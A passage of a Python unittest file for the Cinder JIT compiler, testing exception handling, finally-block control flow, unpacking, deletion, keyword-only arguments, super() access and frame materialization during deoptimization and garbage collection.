self.assertEqual(instrs[tb_prev.tb_lasti // 2].opname, "YIELD_FROM")
def test_for_exception(self):
async def asyncgen():
yield 1
raise ValueError
# Can't use self.assertRaises() as this clears exception tracebacks
try:
asyncio.run(self._f2(asyncgen()))
except ValueError as e:
self._assertExceptionFlowsThroughYieldFrom(e)
else:
self.fail("Expected ValueError to be raised")
@unittest.failUnlessJITCompiled
async def _f3(self, asyncgen):
return [x async for x in asyncgen]
def test_comprehension(self):
async def asyncgen():
yield 1
yield 2
self.assertEqual(asyncio.run(self._f3(asyncgen())), [1, 2])
def test_comprehension_exception(self):
async def asyncgen():
yield 1
raise ValueError
# Can't use self.assertRaises() as this clears exception tracebacks
try:
asyncio.run(self._f3(asyncgen()))
except ValueError as e:
self._assertExceptionFlowsThroughYieldFrom(e)
else:
self.fail("Expected ValueError to be raised")
class Err1(Exception):
pass
class Err2(Exception):
pass
class ExceptionHandlingTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def try_except(self, func):
try:
func()
except:
return True
return False
def test_raise_and_catch(self):
def f():
raise Exception("hello")
self.assertTrue(self.try_except(f))
def g():
pass
self.assertFalse(self.try_except(g))
@unittest.failUnlessJITCompiled
def catch_multiple(self, func):
try:
func()
except Err1:
return 1
except Err2:
return 2
def test_multiple_except_blocks(self):
def f():
raise Err1("err1")
self.assertEqual(self.catch_multiple(f), 1)
def g():
raise Err2("err2")
self.assertEqual(self.catch_multiple(g), 2)
@unittest.failUnlessJITCompiled
def reraise(self, func):
try:
func()
except:
raise
def test_reraise(self):
def f():
raise Exception("hello")
with self.assertRaisesRegex(Exception, "hello"):
self.reraise(f)
@unittest.failUnlessJITCompiled
def try_except_in_loop(self, niters, f):
for i in range(niters):
try:
try:
f(i)
except Err2:
pass
except Err1:
break
return i
def test_try_except_in_loop(self):
def f(i):
if i == 10:
raise Err1("hello")
self.assertEqual(self.try_except_in_loop(20, f), 10)
@unittest.failUnlessJITCompiled
def nested_try_except(self, f):
try:
try:
try:
f()
except:
raise
except:
raise
except:
return 100
def test_nested_try_except(self):
def f():
raise Exception("hello")
self.assertEqual(self.nested_try_except(f), 100)
@unittest.failUnlessJITCompiled
def try_except_in_generator(self, f):
try:
yield f(0)
yield f(1)
yield f(2)
except:
yield 123
def test_except_in_generator(self):
def f(i):
if i == 1:
raise Exception("hello")
return
g = self.try_except_in_generator(f)
next(g)
self.assertEqual(next(g), 123)
@unittest.failUnlessJITCompiled
def try_finally(self, should_raise):
result = None
try:
if should_raise:
raise Exception("testing 123")
finally:
result = 100
return result
def test_try_finally(self):
self.assertEqual(self.try_finally(False), 100)
with self.assertRaisesRegex(Exception, "testing 123"):
self.try_finally(True)
@unittest.failUnlessJITCompiled
def try_except_finally(self, should_raise):
result = None
try:
if should_raise:
raise Exception("testing 123")
except Exception:
result = 200
finally:
if result is None:
result = 100
return result
def test_try_except_finally(self):
self.assertEqual(self.try_except_finally(False), 100)
self.assertEqual(self.try_except_finally(True), 200)
@unittest.failUnlessJITCompiled
def return_in_finally(self, v):
try:
pass
finally:
return v
@unittest.failUnlessJITCompiled
def return_in_finally2(self, v):
try:
return v
finally:
return 100
@unittest.failUnlessJITCompiled
def return_in_finally3(self, v):
try:
1 / 0
finally:
return v
@unittest.failUnlessJITCompiled
def return_in_finally4(self, v):
try:
return 100
finally:
try:
1 / 0
finally:
return v
def test_return_in_finally(self):
self.assertEqual(self.return_in_finally(100), 100)
self.assertEqual(self.return_in_finally2(200), 100)
self.assertEqual(self.return_in_finally3(300), 300)
self.assertEqual(self.return_in_finally4(400), 400)
@unittest.failUnlessJITCompiled
def break_in_finally_after_return(self, x):
for count in [0, 1]:
count2 = 0
while count2 < 20:
count2 += 10
try:
return count + count2
finally:
if x:
break
return "end", count, count2
@unittest.failUnlessJITCompiled
def break_in_finally_after_return2(self, x):
for count in [0, 1]:
for count2 in [10, 20]:
try:
return count + count2
finally:
if x:
break
return "end", count, count2
def test_break_in_finally_after_return(self):
self.assertEqual(self.break_in_finally_after_return(False), 10)
self.assertEqual(self.break_in_finally_after_return(True), ("end", 1, 10))
self.assertEqual(self.break_in_finally_after_return2(False), 10)
self.assertEqual(self.break_in_finally_after_return2(True), ("end", 1, 10))
@unittest.failUnlessJITCompiled
def continue_in_finally_after_return(self, x):
count = 0
while count < 100:
count += 1
try:
return count
finally:
if x:
continue
return "end", count
@unittest.failUnlessJITCompiled
def continue_in_finally_after_return2(self, x):
for count in [0, 1]:
try:
return count
finally:
if x:
continue
return "end", count
def test_continue_in_finally_after_return(self):
self.assertEqual(self.continue_in_finally_after_return(False), 1)
self.assertEqual(self.continue_in_finally_after_return(True), ("end", 100))
self.assertEqual(self.continue_in_finally_after_return2(False), 0)
self.assertEqual(self.continue_in_finally_after_return2(True), ("end", 1))
@unittest.failUnlessJITCompiled
def return_in_loop_in_finally(self, x):
try:
for _ in [1, 2, 3]:
if x:
return x
finally:
pass
return 100
def test_return_in_loop_in_finally(self):
self.assertEqual(self.return_in_loop_in_finally(True), True)
self.assertEqual(self.return_in_loop_in_finally(False), 100)
@unittest.failUnlessJITCompiled
def conditional_return_in_finally(self, x, y, z):
try:
if x:
return x
if y:
return y
finally:
pass
return z
def test_conditional_return_in_finally(self):
self.assertEqual(self.conditional_return_in_finally(100, False, False), 100)
self.assertEqual(self.conditional_return_in_finally(False, 200, False), 200)
self.assertEqual(self.conditional_return_in_finally(False, False, 300), 300)
@unittest.failUnlessJITCompiled
def nested_finally(self, x):
try:
if x:
return x
finally:
try:
y = 10
finally:
z = y
return z
def test_nested_finally(self):
self.assertEqual(self.nested_finally(100), 100)
self.assertEqual(self.nested_finally(False), 10)
class UnpackSequenceTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _unpack_arg(self, seq, which):
a, b, c, d = seq
if which == "a":
return a
if which == "b":
return b
if which == "c":
return c
return d
@unittest.failUnlessJITCompiled
def _unpack_ex_arg(self, seq, which):
a, b, *c, d = seq
if which == "a":
return a
if which == "b":
return b
if which == "c":
return c
return d
def test_unpack_tuple(self):
self.assertEqual(self._unpack_arg(("eh", "bee", "see", "dee"), "b"), "bee")
self.assertEqual(self._unpack_arg((3, 2, 1, 0), "c"), 1)
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_tuple_wrong_size(self):
with self.assertRaises(ValueError):
self._unpack_arg((1, 2, 3, 4, 5), "a")
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_list(self):
self.assertEqual(self._unpack_arg(["one", "two", "three", "four"], "a"), "one")
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_gen(self):
def gen():
yield "first"
yield "second"
yield "third"
yield "fourth"
self.assertEqual(self._unpack_arg(gen(), "d"), "fourth")
@unittest.failUnlessJITCompiled
def _unpack_not_iterable(self):
(a, b, *c) = 1
@unittest.failUnlessJITCompiled
def _unpack_insufficient_values(self):
(a, b, *c) = [1]
@unittest.failUnlessJITCompiled
def _unpack_insufficient_values_after(self):
(a, *b, c, d) = [1, 2]
@unittest.skipUnderCinderJITNotFullFrame("deopt not supported in no-frame mode")
def test_unpack_ex(self):
with self.assertRaises(TypeError):
self._unpack_not_iterable()
with self.assertRaises(ValueError):
self._unpack_insufficient_values()
with self.assertRaises(ValueError):
self._unpack_insufficient_values_after()
seq = [1, 2, 3, 4, 5, 6]
self.assertEqual(self._unpack_ex_arg(seq, "a"), 1)
self.assertEqual(self._unpack_ex_arg(seq, "b"), 2)
self.assertEqual(self._unpack_ex_arg(seq, "c"), [3, 4, 5])
self.assertEqual(self._unpack_ex_arg(seq, "d"), 6)
class DeleteSubscrTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _delit(self, container, key):
del container[key]
def test_builtin_types(self):
l = [1, 2, 3]
self._delit(l, 1)
self.assertEqual(l, [1, 3])
d = {"foo": 1, "bar": 2}
self._delit(d, "foo")
self.assertEqual(d, {"bar": 2})
def test_custom_type(self):
class CustomContainer:
def __init__(self):
self.item = None
def __delitem__(self, item):
self.item = item
c = CustomContainer()
self._delit(c, "foo")
self.assertEqual(c.item, "foo")
def test_missing_key(self):
d = {"foo": 1}
with self.assertRaises(KeyError):
self._delit(d, "bar")
def test_custom_error(self):
class CustomContainer:
def __delitem__(self, item):
raise Exception("testing 123")
c = CustomContainer()
with self.assertRaisesRegex(Exception, "testing 123"):
self._delit(c, "foo")
class DeleteFastTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def _del(self):
x = 2
del x
@unittest.failUnlessJITCompiled
def _del_arg(self, a):
del a
@unittest.failUnlessJITCompiled
def _del_and_raise(self):
x = 2
del x
return x
@unittest.failUnlessJITCompiled
def _del_arg_and_raise(self, a):
del a
return a
@unittest.failUnlessJITCompiled
def _del_ex_no_raise(self):
try:
return min(1, 2)
except Exception as e:
pass
@unittest.failUnlessJITCompiled
def _del_ex_raise(self):
try:
raise Exception()
except Exception as e:
pass
return e
def test_del_local(self):
self.assertEqual(self._del(), None)
def test_del_arg(self):
self.assertEqual(self._del_arg(42), None)
def test_del_and_raise(self):
with self.assertRaises(NameError):
self._del_and_raise()
def test_del_arg_and_raise(self):
with self.assertRaises(NameError):
self.assertEqual(self._del_arg_and_raise(42), None)
def test_del_ex_no_raise(self):
self.assertEqual(self._del_ex_no_raise(), 1)
def test_del_ex_raise(self):
with self.assertRaises(NameError):
self.assertEqual(self._del_ex_raise(), 42)
class KeywordOnlyArgTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def f1(self, *, val=10):
return val
@unittest.failUnlessJITCompiled
def f2(self, which, *, y=10, z=20):
if which == 0:
return y
elif which == 1:
return z
return which
@unittest.failUnlessJITCompiled
def f3(self, which, *, y, z=20):
if which == 0:
return y
elif which == 1:
return z
return which
@unittest.failUnlessJITCompiled
def f4(self, which, *, y, z=20, **kwargs):
if which == 0:
return y
elif which == 1:
return z
elif which == 2:
return kwargs
return which
def test_kwonly_arg_passed_as_positional(self):
msg = "takes 1 positional argument but 2 were given"
with self.assertRaisesRegex(TypeError, msg):
self.f1(100)
msg = "takes 2 positional arguments but 3 were given"
with self.assertRaisesRegex(TypeError, msg):
self.f3(0, 1)
def test_kwonly_args_with_kwdefaults(self):
self.assertEqual(self.f1(), 10)
self.assertEqual(self.f1(val=20), 20)
self.assertEqual(self.f2(0), 10)
self.assertEqual(self.f2(0, y=20), 20)
self.assertEqual(self.f2(1), 20)
self.assertEqual(self.f2(1, z=30), 30)
def test_kwonly_args_without_kwdefaults(self):
self.assertEqual(self.f3(0, y=10), 10)
self.assertEqual(self.f3(1, y=10), 20)
self.assertEqual(self.f3(1, y=10, z=30), 30)
def test_kwonly_args_and_varkwargs(self):
self.assertEqual(self.f4(0, y=10), 10)
self.assertEqual(self.f4(1, y=10), 20)
self.assertEqual(self.f4(1, y=10, z=30, a=40), 30)
self.assertEqual(self.f4(2, y=10, z=30, a=40, b=50), {"a": 40, "b": 50})
class ClassA:
z = 100
x = 41
def g(self, a):
return 42 + a
@classmethod
def cls_g(cls, a):
return 100 + a
class ClassB(ClassA):
def f(self, a):
return super().g(a=a)
def f_2arg(self, a):
return super(ClassB, self).g(a=a)
@classmethod
def cls_f(cls, a):
return super().cls_g(a=a)
@classmethod
def cls_f_2arg(cls, a):
return super(ClassB, cls).cls_g(a=a)
@property
def x(self):
return super().x + 1
@property
def x_2arg(self):
return super(ClassB, self).x + 1
class SuperAccessTest(unittest.TestCase):
@unittest.failUnlessJITCompiled
def test_super_method(self):
self.assertEqual(ClassB().f(1), 43)
self.assertEqual(ClassB().f_2arg(1), 43)
self.assertEqual(ClassB.cls_f(99), 199)
self.assertEqual(ClassB.cls_f_2arg(99), 199)
@unittest.failUnlessJITCompiled
def test_super_method_kwarg(self):
self.assertEqual(ClassB().f(1), 43)
self.assertEqual(ClassB().f_2arg(1), 43)
self.assertEqual(ClassB.cls_f(1), 101)
self.assertEqual(ClassB.cls_f_2arg(1), 101)
@unittest.failUnlessJITCompiled
def test_super_attr(self):
self.assertEqual(ClassB().x, 42)
self.assertEqual(ClassB().x_2arg, 42)
class RegressionTests(StaticTestBase):
# Detects an issue in the backend where the Store instruction generated 32-
# bit memory writes for 64-bit constants.
def test_store_of_64bit_immediates(self):
codestr = f"""
from __static__ import int64, box
class Cint64:
def __init__(self):
self.a: int64 = 0x5555555555555555
def testfunc():
c = Cint64()
c.a = 2
return box(c.a) == 2
"""
with self.in_module(codestr) as mod:
testfunc = mod.testfunc
self.assertTrue(testfunc())
if cinderjit:
self.assertTrue(cinderjit.is_jit_compiled(testfunc))
@unittest.skipUnlessCinderJITEnabled("Requires cinderjit module")
class CinderJitModuleTests(StaticTestBase):
def test_bad_disable(self):
with self.assertRaises(TypeError):
cinderjit.disable(1, 2)
with self.assertRaises(TypeError):
cinderjit.disable(None)
def test_jit_force_normal_frame_changes_flags(self):
def x():
pass
self.assertEqual(x.__code__.co_flags & CO_NORMAL_FRAME, 0)
forced_x = cinderjit.jit_force_normal_frame(x)
self.assertEqual(x.__code__.co_flags & CO_NORMAL_FRAME, CO_NORMAL_FRAME)
def test_jit_force_normal_frame_raises_on_invalid_arg(self):
with self.assertRaises(TypeError):
cinderjit.jit_force_normal_frame(None)
def test_jit_suppress(self):
@cinderjit.jit_suppress
def x():
pass
self.assertEqual(x.__code__.co_flags & CO_SUPPRESS_JIT, CO_SUPPRESS_JIT)
def test_jit_suppress_static(self):
codestr = f"""
import cinderjit
@cinderjit.jit_suppress
def f():
return True
def g():
return True
"""
with self.in_module(codestr) as mod:
f = mod.f
g = mod.g
self.assertTrue(f())
self.assertTrue(g())
self.assertFalse(cinderjit.is_jit_compiled(f))
self.assertTrue(cinderjit.is_jit_compiled(g))
@jit_suppress
def _inner(*args, **kwargs):
return kwargs
@unittest.failUnlessJITCompiled
def _outer(args, kwargs):
return _inner(*args, **kwargs)
class GetFrameInFinalizer:
def __del__(self):
sys._getframe()
def _create_getframe_cycle():
a = {"fg": GetFrameInFinalizer()}
b = {"a": a}
a["b"] = b
return a
class TestException(Exception):
pass
class GetFrameTests(unittest.TestCase):
@unittest.failUnlessJITCompiled
def f1(self, leaf):
return self.f2(leaf)
@unittest.failUnlessJITCompiled
def f2(self, leaf):
return self.f3(leaf)
@unittest.failUnlessJITCompiled
def f3(self, leaf):
return leaf()
def assert_frames(self, frame, names):
for name in names:
self.assertEqual(frame.f_code.co_name, name)
frame = frame.f_back
@unittest.failUnlessJITCompiled
def simple_getframe(self):
return sys._getframe()
def test_simple_getframe(self):
stack = ["simple_getframe", "f3", "f2", "f1", "test_simple_getframe"]
frame = self.f1(self.simple_getframe)
self.assert_frames(frame, stack)
@unittest.failUnlessJITCompiled
def consecutive_getframe(self):
f1 = sys._getframe()
f2 = sys._getframe()
return f1, f2
def test_consecutive_getframe(self):
stack = ["consecutive_getframe", "f3", "f2", "f1", "test_consecutive_getframe"]
frame1, frame2 = self.f1(self.consecutive_getframe)
self.assert_frames(frame1, stack)
# Make sure the second call to sys._getframe doesn't rematerialize
# frames
for _ in range(4):
self.assertTrue(frame1 is frame2)
frame1 = frame1.f_back
frame2 = frame2.f_back
@unittest.failUnlessJITCompiled
def getframe_then_deopt(self):
f = sys._getframe()
try:
raise Exception("testing 123")
except:
return f
def test_getframe_then_deopt(self):
# Make sure we correctly unlink a materialized frame after its function
# deopts into the interpreter
stack = ["getframe_then_deopt", "f3", "f2", "f1", "test_getframe_then_deopt"]
frame = self.f1(self.getframe_then_deopt)
self.assert_frames(frame, stack)
@unittest.failUnlessJITCompiled
def getframe_in_except(self):
try:
raise Exception("testing 123")
except:
return sys._getframe()
def test_getframe_after_deopt(self):
stack = ["getframe_in_except", "f3", "f2", "f1", "test_getframe_after_deopt"]
frame = self.f1(self.getframe_in_except)
self.assert_frames(frame, stack)
class FrameGetter:
def __init__(self, box):
self.box = box
def __del__(self):
self.box[0] = sys._getframe()
def do_raise(self, x):
# Clear reference held by frame in the traceback that gets created with
# the exception
del x
raise Exception("testing 123")
@unittest.failUnlessJITCompiled
def getframe_in_dtor_during_deopt(self):
ref = ["notaframe"]
try:
self.do_raise(self.FrameGetter(ref))
except:
return ref[0]
def test_getframe_in_dtor_during_deopt(self):
# Test that we can correctly walk the stack in the middle of deopting
frame = self.f1(self.getframe_in_dtor_during_deopt)
stack = [
"__del__",
"getframe_in_dtor_during_deopt",
"f3",
"f2",
"f1",
"test_getframe_in_dtor_during_deopt",
]
self.assert_frames(frame, stack)
@unittest.failUnlessJITCompiled
def getframe_in_dtor_after_deopt(self):
ref = ["notaframe"]
frame_getter = self.FrameGetter(ref)
try:
raise Exception("testing 123")
except:
return ref
def test_getframe_in_dtor_after_deopt(self):
# Test that we can correctly walk the stack in the interpreter after
# deopting but before returning to the caller
frame = self.f1(self.getframe_in_dtor_after_deopt)[0]
stack = ["__del__", "f3", "f2", "f1", "test_getframe_in_dtor_after_deopt"]
self.assert_frames(frame, stack)
@jit_suppress
def test_frame_allocation_race(self):
# This test exercises a race condition that can occur in the
# interpreted function prologue between when its frame is
# allocated and when its set as `tstate->frame`.
#
# When a frame is allocated its f_back field is set to point to
# tstate->frame. Shortly thereafter, tstate->frame is set to the
# newly allocated frame by the interpreter loop. There is an implicit
# assumption that tstate->frame will not change between when the
# frame is allocated and when it is set to tstate->frame. That
# assumption is invalid when the JIT is executing in shadow-frame mode.
#
# tstate->frame may change if the Python stack is materialized between
# when the new frame is allocated and when its set as
# tstate->frame. The window of time is very small, but it's
# possible. We must ensure that if tstate->frame changes, the newly
# allocated frame's f_back is updated to point to it. Otherwise, we can
# end up with a missing frame on the Python stack. To see why, consider
# the following scenario.
#
# Terms:
#
# - shadow stack - The call stack of _PyShadowFrame objects beginning
# at tstate->shadow_frame.
# - pyframe stack - The call stack of PyFrameObject objects beginning
# at tstate->frame.
#
# T0:
#
# At time T0, the stacks look like:
#
# Shadow Stack PyFrame Stack
# ------------ ------------
# f0 f0
# f1
#
# - f0 is interpreted and has called f2.
# - f1 is jit-compiled and is running in shadow-frame mode. The stack
# hasn't been materialized, so there is no entry for f1 on the
# PyFrame stack.
#
# T1:
#
# At time T1, f1 calls f2. f2 is interpreted and has a variable keyword
# parameter (**kwargs). The call to f2 enters PyEval_EvalCodeWithName.
# PyEval_EvalCodeWithName allocates a new PyFrameObject, p, to run
# f2. At this point the stacks still look the same, however, notice
# that p->f_back points to f0, not f1.
#
# Shadow Stack PyFrame Stack
# ------------ ------------
# f0 f0 <--- p->f_back points to f1
# f1
#
# T2:
#
# At time T2, PyEval_EvalCodeWithName has allocated the PyFrameObject,
# p, for f2, and allocates a new dictionary for the variable keyword
# parameter. The dictionary allocation triggers GC. During GC an object
# is collected with a finalizer that materializes the stack. The most
# common way for this to happen is through an unawaited coroutine. The
# coroutine's finalizer will call _PyErr_WarnUnawaitedCoroutine which
# materializes the stack.
#
# Notice that the stacks match after materialization, however,
# p->f_back still points to f0.
#
# Shadow Stack PyFrame Stack
# ------------ ------------
# f0 f0 <--- p->f_back points to f0
# f1 f1
#
# T3:
#
# At time T3, control has transferred from PyEval_EvalCodeWithName
# to the interpreter loop. The interpreter loop has set tstate->frame
# to the frame it was passed, p. Now the stacks are mismatched:
#
# Shadow Stack PyFrame Stack
# ------------ ------------
# f0 f0
# f1 f2
# f2
#
# T4:
#
# At time T4, f2 finishes execution and returns into f1.
#
# Shadow Stack PyFrame Stack
# ------------ ------------
# f0 f0
# f1
#
# T5:
#
# At time T5, f1 finishes executing and attempts to return. Since the
# stack was materialized, it expects to find a PyFrameObject for
# f1 at the top of the PyFrame stack and aborts when it does not.
#
# The test below exercises this scenario.
thresholds = gc.get_threshold()
# Initialize zombie frame for _inner (called by _outer). The zombie
# frame will be used the next time _inner is called. This avoids a
# trip to the allocator that could trigger GC.
args = []
kwargs = {"foo": 1}
_outer(args, kwargs)
# Reset counts to zero. This allows us to set a threshold for
# the first generation that will trigger collection when the keyword
# dictionary is allocated in PyEval_EvalCodeWithName.
gc.collect()
# Create cyclic garbage that will materialize the Python stack when
# it is collected
_create_getframe_cycle()
try:
# JITRT_CallFunctionEx constructs a new keyword dictionary and args
# tuple. PyEval_EvalCodeWithName does as well.
gc.set_threshold(4)
_outer(args, kwargs)
finally:
gc.set_threshold(*thresholds)
class GetGenFrameDuringThrowTest(unittest.TestCase):
def setUp(self) -> None:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
self.loop = loop
def tearDown(self):
self.loop.close()
asyncio.set_event_loop_policy(None)
@unittest.failUnlessJITCompiled
async def outer_propagates_exc(self, inner):
return await inner
@unittest.failUnlessJITCompiled
async def outer_handles_exc(self, inner):
try:
await inner
except TestException:
return 123
async def inner(self, fut, outer_box):
try:
await fut
except TestException:
outer_coro = outer_box[0]
outer_coro.cr_frame
raise
def run_test(self, outer_func):
box = [None]
fut = asyncio.Future()
inner = self.inner(fut, box)
outer = outer_func(inner)
box[0] = outer
outer.send(None)
return outer.throw(TestException())
def test_unhandled_exc(self):
with self.assertRaises(TestException):
self.run_test(self.outer_propagates_exc)
def test_handled_exc(self):
with self.assertRaises(StopIteration) as cm:
self.run_test(self.outer_handles_exc)
self.assertEqual(cm.exception.value, 123)
class DeleteAttrTests(unittest.TestCase):
def test_delete_attr(self):
class C:
pass
c = C()
c.foo = "bar"
self.assertEqual(c.foo, "bar")
del c.foo
with self.assertRaises(AttributeError):
c.foo
def test_delete_attr_raises(self):
class C:
@property
def foo(self):
return "hi"
c = C()
self.assertEqual(c.foo, "hi")
with self.assertRaises(AttributeError):
del c.foo
_cmp_key = cmp_to_key(lambda x, y: 0)
class OtherTests(unittest.TestCase):
def test_type_ready(self):
# T100786119: type(_cmp_key) should have been initialized, or JIT
# will fail during compilation.
self.cmp_key = _cmp_key
if __name__ == "__main__":
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.